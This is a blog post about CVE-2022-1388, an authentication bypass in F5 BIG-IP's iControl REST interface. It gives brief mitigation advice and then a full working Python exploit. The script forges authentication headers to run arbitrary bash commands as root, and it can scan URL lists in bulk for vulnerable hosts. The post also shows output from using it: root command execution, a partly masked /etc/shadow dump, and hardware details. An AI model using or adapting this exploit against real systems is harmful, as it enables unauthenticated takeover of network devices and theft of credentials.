Diniz Martins
- May 9, 2022
- 2 min read

F5 | CVE-2022-1388

A proof of concept (PoC) was developed for a critical vulnerability in F5's BIG-IP networking software that could expose thousands of users to remote control.

The vulnerability, tracked as CVE-2022-1388, could allow an attacker to make undisclosed requests to bypass iControl's REST authentication.

If exploited, an unauthenticated user could get remote code execution (RCE) on an affected device. 👽

Affected Devices

Everything older than version 17. Patches are available for BIG-IP versions 13-16. BIG-IP version 11 and 12 are vulnerable with no available patch.

So what should you do?

Usually, I recommend patching first and later attending to the configuration issues. But in this case, I will swap this order: First, make sure you are not exposing the admin interface. If you can't manage that: Don't try patching. Turn off the device instead. If the configuration interface is safe: Patch!

▓ CVE-2022-1388.py:

import os
import sys
import argparse
import urllib3
import requests
urllib3.disable_warnings()


headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-type": "application/json",
        "Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
        "X-F5-Auth-Token": "anything",
        "Authorization": "Basic YWRtaW46"}

endpoint = "/mgmt/tm/util/bash"

def usage():
    print("Eg: \n    python3 CVE-2022-1388.py -u https://127.0.0.1")
    print("    python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'")
    print("    python3 CVE-2022-1388.py -f urls.txt")
    
def poc(url):
    payload = {"command": "run", "utilCmdArgs": "-c id"}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass
    
def exp(url, command):
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            print(res.json()['commandResult'])
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    urls = []
                    urls = target.read().splitlines()
                    for url in urls:
                        if poc(url) == True:
                            with open("success.txt", "a+") as f:
                                f.write(url + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        parser.print_help()
        usage()

▓ Outputs:

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address>
[+] https://<ip-address> is vulnerable!!!

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'id'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'cat /etc/shadow'
...
root:$6$TMuNP0xxxxxxxx
admin:$6$83fzG1vk$7wpUV.vkxxxxxx
...

⇡ sha512—Produces a 512-bit digest. The encrypted password starts with $6$.

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'tmsh show sys hardware'

Sys::Hardware
Chassis Information
  Maximum MAC Count  1
  Registration Key   -

Hardware Version Information
  Name        cpus
  Type        base-board
  Model       Intel Xeon Processor (Skylake, IBRS)
  Parameters  --            --
              cache size    4096 KB
              cores         24  (physical:24)
              cpu MHz       2194.838
              cpu sockets   24
              cpu stepping  4


Platform
  Name  BIG-IP Virtual Edition
  BIOS Revision
  Base MAC       52:54:00:xx:55:ba
  Hypervisor     KVM
  Cloud

System Information
  Type                       Z100
  Chassis Serial             191931f7-0dcb-4d7c-45xe
  Level 200/400 Part
  Switchboard Serial
  Switchboard Part Revision
  Host Board Serial
  Host Board Part Revision

STENGE

uWhwHmca3RyT0nrkPjfRm++X5+/HFfpSkqThX+8ft2E=

F5 | CVE-2022-1388

Recent Posts